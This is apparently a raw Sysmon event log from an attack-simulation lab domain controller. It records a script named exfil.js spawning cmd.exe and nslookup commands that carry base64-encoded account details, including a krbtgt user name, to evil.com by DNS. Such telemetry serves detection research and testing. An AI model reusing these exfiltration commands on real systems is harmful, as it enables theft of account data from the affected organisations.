14:16:46.279{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1942-000000005F02}5432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.279{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.279{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.264{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.264{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.264{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1842-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.264{2E1864BB-17A1-629A-783D-000000005F02}55522928C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-1842-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.277{2E1864BB-17CE-629A-1842-000000005F02}6960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.264{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllgq.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-17CE-629A-1642-000000005F02}63881488C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1742-000000005F02}5584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1742-000000005F02}5584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.241{2E1864BB-17CE-629A-1542-000000005F02}77163732C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-1742-000000005F02}5584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.245{2E1864BB-17CE-629A-1742-000000005F02}5584C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-1542-000000005F02}7716C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgq.tmp 2>&1 10341000x8000000000000000204475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.225{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1642-000000005F02}6388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.225{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1642-000000005F02}6388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.210{2E1864BB-17CE-629A-1642-000000005F02}63881488C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1542-000000005F02}7716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.210{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1642-000000005F02}6388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1542-000000005F02}7716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-17A1-629A-783D-000000005F02}55524468C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-1542-000000005F02}7716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.207{2E1864BB-17CE-629A-1542-000000005F02}7716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.194{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllgzyg.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.178{2E1864BB-17CE-629A-1342-000000005F02}56087884C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1442-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.178{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 